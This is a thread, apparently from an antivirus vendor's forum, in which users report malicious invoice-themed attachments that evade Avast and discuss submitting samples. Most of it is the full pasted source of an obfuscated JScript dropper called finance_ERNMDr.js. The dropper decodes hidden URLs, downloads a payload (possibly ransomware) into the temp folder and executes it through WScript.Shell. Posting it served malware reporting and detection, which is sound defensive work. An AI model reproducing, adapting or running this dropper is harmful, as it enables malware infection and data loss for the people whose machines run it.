Avast Endpoint Protection Suite Plus.
Malware come as Winword document named for example FACTURA_16510F.doc.doc
After 24h still undetected by Exchange plug-in or file shield.
Running MsWord in sandbox on test machine show us the malicious actions but avast is incapable to stop spreading.
always post link to scan result, as there is lots of info we cant see from a pic
If you give link avast can see the MD5 and fetch the sample from VT
also see this >> https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438
File submitted to avast via “Report files to the avast virus lab” via UI.
No idea if the report system is up&running.
File submitted to avast via "Report files to the avast virus lab" via UI. No idea if the report system is up&running.Then it should now be in there autoanalysis system and soon detected
Fixed just now. Thank you!
Hello,
the sample which is in VT link does not came to us from avast’s submit
Milos
Received today as finance_ERNMDr.js
https://virustotal.com/en/file/9dc19555d7e18f2ab52f11c681b1b77622e13b32bca647fa3fd4f8a1920fdefb/analysis/
function ugBGdd(WDUMuBD) {
return "LfFVaQXWbQrafO";
}
function wHDO(JsBdh,Mricp) {
var hiMQQA=["CKxnTNTN","\x77"+"\x72\x69","\x74\x65"];JsBdh[hiMQQA[1]+hiMQQA[2]](Mricp)
}
function vXSm(vvLfi) {
var rmmIXAJ=["\x6F\x70"+"\x65\x6E"];vvLfi[rmmIXAJ[512-512]]();
}
function LdwL(vsQUJ,GjTKY,fWnGt) {
zXKD=vsQUJ;
//OVcXfwArsljb
zXKD.open(fWnGt,GjTKY,false);
}
function wMQi(idaPz) {
if (idaPz == 525-325){return true;} else {return false;}
}
function WwRv(AFoFh) {
if (AFoFh > 194552-540){return true;} else {return false;}
}
function pBUUs(XIhUzsMy,YETu) {
return "";
}
function NNTC(NcpfK) {
var ZGGAWvpw=["\x73\x65"+"\x6E\x64"];
NcpfK[ZGGAWvpw[0]]();
}
function Yerj(Cqisw) {
return Cqisw.status;
}
function ItgMlmd(FtcD,CPxLz) {
BMAviLJ=[];
BMAviLJ.push(FtcD.ExpandEnvironmentStrings(CPxLz));
return BMAviLJ[0];
}
function YLRmWfB(HOEl) {
var DZIXhQo=("\x72\x65\x73\x70\x6F\x6E*\x73\x65\x42\x6F\x64\x79").split("*");
return HOEl[DZIXhQo[0]+DZIXhQo[1]];
}
function zfLr(cKsxV,JZzJL) {
var VPHFv=("\x54\x6F\x46*\x69\x6C\x65*\x73\x61*\x76\x65").split("*");
var YNJofthT=VPHFv[964-964];
var SeRmbp=VPHFv[385-383]+VPHFv[534-531]+YNJofthT+VPHFv[364-363];
var Ycbbryn=[SeRmbp];cKsxV[Ycbbryn[872-872]](JZzJL,878-876);
}
function ApmvqIaG(YGi) {
return YGi.size;
}
function AJLfw(HjgdnX) {
var mWLJ=["\x70\x6F\x73\x69\x74\x69\x6F\x6E"];
return HjgdnX[mWLJ[112-112]]=531-531;
}
function RfhDD(IhP,PBBBA) {
var huKQ=["\x73\x70\x6C\x69\x74"];
return IhP[huKQ[0]](PBBBA);
}
function PXVH(jcMaJ) {
frlguyL=WScript.CreateObject(jcMaJ);
return frlguyL;
}
function feMVH(hKNgAm) {
var gGiZ=hKNgAm;
return new ActiveXObject(gGiZ);
}
function Bbel(MwLSU) {
var XpIHi="";
K=(869-869);
do {
if (K >= MwLSU.length) {break;}
if (K % (208-206) != (642-642)) {
var PczOL = MwLSU.substring(K, K+(408-407));
XpIHi += PczOL;
}
K++;
} while(true);
return XpIHi;
}
var CF="z?M 9?t KgFrPezeEtYi4nagbsNyaoduznKg1qhqI.jcioFmd/p7h0SsSv0yCx3?x 9gdoyo8g2ldet.YcuoPm2/u7B0ksLvayNxK?b Y?";
var qU = Bbel(CF).split(" ");
var EawRKh = ". DLyIqG e GYSWyrCX xe svyx".split(" ");
var u = [qU[0].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[1].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[2].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[3].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4]),qU[4].replace(new RegExp(EawRKh[5],'g'), EawRKh[0]+EawRKh[2]+EawRKh[4])];
var Ssf = IxGpIgvki("judU");
var zkR = feMVH(bRFkawbl("DMXuw"));
var GIZxNc = ("zPMNAcQ \\").split(" ");
var QiCo = Ssf+GIZxNc[0]+GIZxNc[1];
Cgrzqz(zkR,QiCo);
var Iwg = ("2.XMLHTTP vKcrgwn BUpXR XML ream St VsRhPnEU AD upCUihc O Ltxl D").split(" ");
var tg = true , JiRl = Iwg[7] + Iwg[9] + Iwg[11];
var rl = PXVH("MS"+Iwg[3]+(459567, Iwg[0]));
var kTS = PXVH(JiRl + "B." + Iwg[5]+(715328, Iwg[4]));
var syK = 0;
var M = 1;
var EnnzxlW = 509888;
var N=syK;
while (true) {
if(N>=u.length) {break;}
var xc = 0;
var cRx = ("ht" + " fZKxVOO tp yzfYS aEWydzTF :// HRUzypR .e NiAoL x gAtzwo e G unjXhuv E JCBKOtOR T auaZ").split(" ");
try {
var GudWPdo=cRx[747-742];
var mTEjU=cRx[211-211]+cRx[996-994]+GudWPdo;
LdwL(rl,mTEjU+u[N]+M, cRx[12]+cRx[14]+cRx[16]); NNTC(rl);
if (wMQi(Yerj(rl))) {
vXSm(kTS); kTS.type = 1; wHDO(kTS,YLRmWfB(rl)); if (WwRv(ApmvqIaG(kTS))) {
lHsnXqw=/*3adR59o2pu*/QiCo/*WCV960bZSa*/+EnnzxlW+cRx[642-635]+cRx[139-130]+cRx[813-802];
xc = 327-326;AJLfw(kTS);zfLr(kTS,lHsnXqw);
if (198>30) {
try {QQNtUXGEG(QiCo+EnnzxlW+cRx[662-655]+cRx[217-208]+cRx[127-116]);
}
catch (Ky) {
};
break;
}
}; kTS.close();
};
if (xc == 1) {
syK = N; break;
};
}
catch (Ky) {
};
N++;
};
function Cgrzqz(dyXJ,DzvbYa) {
try {dyXJ.CreateFolder(DzvbYa);}catch(RHPSHw){};
}
function QQNtUXGEG(DGVLHuJmCud) {
var kgYUxptk = RfhDD("nYYI=Ws=YVYzanO=c=ERoqEU=ri"+"=pt=AgLjTRIS=.S=wqaRx=he=oHRuOA=l"+"l=oCccVYp"+"=YbmhmZSM=zKTQ", "=");
var siwPYZXt = PXVH(kgYUxptk[116-115] + kgYUxptk[889-886] + kgYUxptk[856-851] + kgYUxptk[426-420] + kgYUxptk[719-711] + kgYUxptk[588-578]+kgYUxptk[438-426]);
wmAypLdO(siwPYZXt,DGVLHuJmCud);
}
function/*7Z0v*/wmAypLdO(mervF,GIaWSI) {
var cGZHRX= ("eTuinkRSSKQ;\x72;\x75;\x6E;RqKQQGKLZBoh").split(";");
var lja=cGZHRX[134-133]+cGZHRX[690-688]+cGZHRX[401-398];
var HHZZ=/*KXDE*/[lja];
//sqdI
mervF[HHZZ[741-741]](GIaWSI);
}
function IxGpIgvki(WziJh) {
var cGDVwnT = "ZxgGon*NNl*pt.S"+"he"+"ll*cDAlHIk*Sc"+"ri*";
var hprUi = RfhDD(cGDVwnT+"ZzHa*%T"+"E*MP%*\\*ulhKZsODB*JpssvV*BOhaMni*UrWuw", "*");
var GGe=((559-558)?"W" + hprUi[318-314]:"")+hprUi[548-546];
var qC = PXVH(GGe);
QMAPgv=hprUi[615-609]+hprUi[951-944];
return ItgMlmd(qC,QMAPgv+hprUi[491-483]);
}
function bRFkawbl(FcbE) {
var TKvSffTHxh = "Sc MhkbRrV r TYeXVhnnq ipt"+"ing uXXeckM ZSx ile vYlmbhOiZlRwWt";
var XZeFJTJ = RfhDD(TKvSffTHxh+" "+"Sys"+"tem yI IgnZV Obj LeDlln ect ACRjVrY WqmiV", " ");
return XZeFJTJ[0] + XZeFJTJ[2] + XZeFJTJ[4] + ".F" + XZeFJTJ[7] + XZeFJTJ[9] + XZeFJTJ[12] + XZeFJTJ[14];
}
Submitted, but after 36h avast still is happy with this file.
It can take some time to detect the files unfortunately depending on the amount of staff, files and if its detected by the automated systems.
The payload it download (ransomware?) is taken down. Checked in malwarebytes forum yesterday
hmmm … seems the url is up and running again. Sample sendt avast lab
https://virustotal.com/en/file/a468a0c5aea6e25ab0d585c6caa169e3ccb579c909525a74b6595166be17b53b/analysis/1460561651/
detected now > https://virusscan.jotti.org/en-US/filescanjob/b0ley1audw